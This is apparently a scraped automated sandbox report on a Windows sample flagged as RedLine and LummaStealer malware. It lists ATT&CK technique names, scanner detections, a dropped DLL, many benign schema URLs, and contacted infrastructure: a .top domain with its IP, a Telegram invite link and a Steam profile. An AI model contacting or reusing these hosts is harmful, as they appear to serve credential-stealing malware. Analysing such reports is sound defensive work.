                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts21
                Obfuscated Files or Information                		Cached Domain Credentials124
                System Information Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                Software Packing                		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                CCdaw0qbbo.exe83%ReversingLabsWin32.Ransomware.RedLine
                CCdaw0qbbo.exe100%AviraHEUR/AGEN.1311038
                CCdaw0qbbo.exe100%Joe Sandbox ML

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Roaming\d3d9.dll100%Joe Sandbox ML
                C:\Users\user\AppData\Roaming\d3d9.dll70%ReversingLabsWin32.Trojan.LummaStealer

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text0%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2005/02/sc/sct0%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk0%URL Reputationsafe
                http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary0%URL Reputationsafe
                http://tempuri.org/0%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha10%URL Reputationsafe
                http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap0%URL Reputationsafe
                http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID0%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare0%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret0%URL Reputationsafe
                http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license0%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue0%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted0%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence0%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2004/10/wsat/fault0%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2004/10/wsat0%URL Reputationsafe
                http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey0%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew0%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register0%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey0%URL Reputationsafe
                https://api.ip.sb/ip0%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2004/04/sc0%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC0%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel0%URL Reputationsafe
                http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA10%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA10%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue0%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested0%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly0%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay0%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego0%URL Reputationsafe
                http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary0%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC0%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey0%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2004/08/addressing0%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue0%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion0%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2004/04/trust0%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse0%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel0%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce0%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns0%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2005/02/trust/Renew0%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey0%URL Reputationsafe
                http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.00%URL Reputationsafe
                http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID0%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT0%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2006/02/addressingidentity0%URL Reputationsafe
                http://schemas.xmlsoap.org/soap/envelope/0%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey0%URL Reputationsafe
                http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA10%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2005/02/trust0%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback0%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT0%URL Reputationsafe
                http://tempuri.org/D0%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2004/06/addressingex0%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2004/10/wscoor0%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce0%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse0%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew0%URL Reputationsafe
                http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ15100%URL Reputationsafe
                http://tempuri.org/Contract/MSValue2Response0%Avira URL Cloudsafe
                http://tempuri.org/Contract/MSValue3ResponseD0%Avira URL Cloudsafe
                http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey0%URL Reputationsafe
                http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ0%URL Reputationsafe
                http://www.w3.o0%URL Reputationsafe
                http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd0%URL Reputationsafe
                http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif0%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed0%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA10%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault0%URL Reputationsafe
                http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA10%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty0%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct0%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse0%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel0%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement0%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT0%URL Reputationsafe
                http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.10%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous0%URL Reputationsafe
                http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap0%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2002/12/policy0%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2005/02/sc/dk0%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue0%URL Reputationsafe
                https://t.me/+J_Z1QGHfHko0MGZi0%Avira URL Cloudsafe
                http://tempuri.org/Contract/MSValue3Response0%Avira URL Cloudsafe
                http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue0%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit0%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext0%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2005/02/trust/Issue0%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT0%URL Reputationsafe
                http://tempuri.org/Contract/MSValue2ResponseD0%Avira URL Cloudsafe
                http://schemas.xmlsoap.org/ws/2004/08/addressing/faultD0%Avira URL Cloudsafe
                https://t.me/0%Avira URL Cloudsafe
                http://tempuri.org/Contract/MSValue10%Avira URL Cloudsafe
                http://tempuri.org/Contract/MSValue20%Avira URL Cloudsafe
                http://tempuri.org/Contract/MSValue30%Avira URL Cloudsafe
                https://t.me/+J_Z1QGHfHko0MGZi*https://steamcommunity.com/id/elcadillac0%Avira URL Cloudsafe
                http://tempuri.org/Contract/MSValue1ResponseD0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                up.nexgor.top
                		157.90.30.125
                		truefalse
                  		unknown
                  t.me
                  		149.154.167.99
                  		truetrue
                    		unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    https://t.me/+J_Z1QGHfHko0MGZitrue
                    • Avira URL Cloud: safe
                    		unknown
                    https://t.me/+J_Z1QGHfHko0MGZi*https://steamcommunity.com/id/elcadillactrue
                    • Avira URL Cloud: safe
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#TextMSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2005/02/sc/sctMSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2004/04/security/sc/dkMSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinaryMSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://tempuri.org/Contract/MSValue3ResponseDMSBuild.exe, 00000002.00000002.1689531411.00000000090D1000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://tempuri.org/Contract/MSValue2ResponseMSBuild.exe, 00000002.00000002.1681409379.0000000002E3F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://tempuri.org/MSBuild.exe, 00000002.00000002.1681409379.0000000002E3F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1MSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_WrapMSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLIDMSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2004/10/wsat/PrepareMSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecretMSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#licenseMSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/IssueMSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2004/10/wsat/AbortedMSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequenceMSBuild.exe, 00000002.00000002.1681409379.0000000002E3F000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2004/10/wsat/faultMSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2004/10/wsatMSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeyMSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameMSBuild.exe, 00000002.00000002.1681409379.0000000002DF1000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/RenewMSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterMSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKeyMSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://api.ip.sb/ipCCdaw0qbbo.exe, CCdaw0qbbo.exe, 00000000.00000002.1625235966.000000006E37A000.00000004.00000001.01000000.00000007.sdmp, MSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.1679657950.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2004/04/scMSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PCMSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/CancelMSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1MSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://tempuri.org/Contract/MSValue3ResponseMSBuild.exe, 00000002.00000002.1681409379.0000000002E3F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.1689531411.00000000090D1000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1MSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/IssueMSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequestedMSBuild.exe, 00000002.00000002.1681409379.0000000002E3F000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnlyMSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2004/10/wsat/ReplayMSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnegoMSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64BinaryMSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PCMSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKeyMSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2004/08/addressingMSBuild.exe, 00000002.00000002.1681409379.0000000002E3F000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2005/02/trust/RST/IssueMSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2004/10/wsat/CompletionMSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2004/04/trustMSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponseMSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/CancelMSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2005/02/trust/NonceMSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://tempuri.org/Contract/MSValue2ResponseDMSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2004/08/addressing/faultDMSBuild.exe, 00000002.00000002.1681409379.0000000002E3F000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dnsMSBuild.exe, 00000002.00000002.1681409379.0000000002E3F000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2005/02/trust/RenewMSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://t.me/MSBuild.exe, 00000002.00000002.1681409379.0000000002DF1000.00000004.00000800.00020000.00000000.sdmptrue
                    • Avira URL Cloud: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKeyMSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0MSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionIDMSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCTMSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2006/02/addressingidentityMSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://schemas.xmlsoap.org/soap/envelope/MSBuild.exe, 00000002.00000002.1681409379.0000000002E3F000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKeyMSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1MSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://tempuri.org/Contract/MSValue1MSBuild.exe, 00000002.00000002.1681409379.0000000002E3F000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2005/02/trustMSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://tempuri.org/Contract/MSValue2MSBuild.exe, 00000002.00000002.1681409379.0000000002E3F000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://tempuri.org/Contract/MSValue3MSBuild.exe, 00000002.00000002.1681409379.0000000002E3F000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2004/10/wsat/RollbackMSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCTMSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://tempuri.org/DMSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2004/06/addressingexMSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2004/10/wscoorMSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2004/04/security/trust/NonceMSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponseMSBuild.exe, 00000002.00000002.1681409379.0000000002E3F000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/RenewMSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510MSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKeyMSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQMSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.w3.oMSBuild.exe, 00000002.00000002.1689531411.00000000092C9000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.1689531411.00000000090D1000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdMSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentifMSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2004/10/wsat/CommittedMSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1MSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2004/10/wscoor/faultMSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1MSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
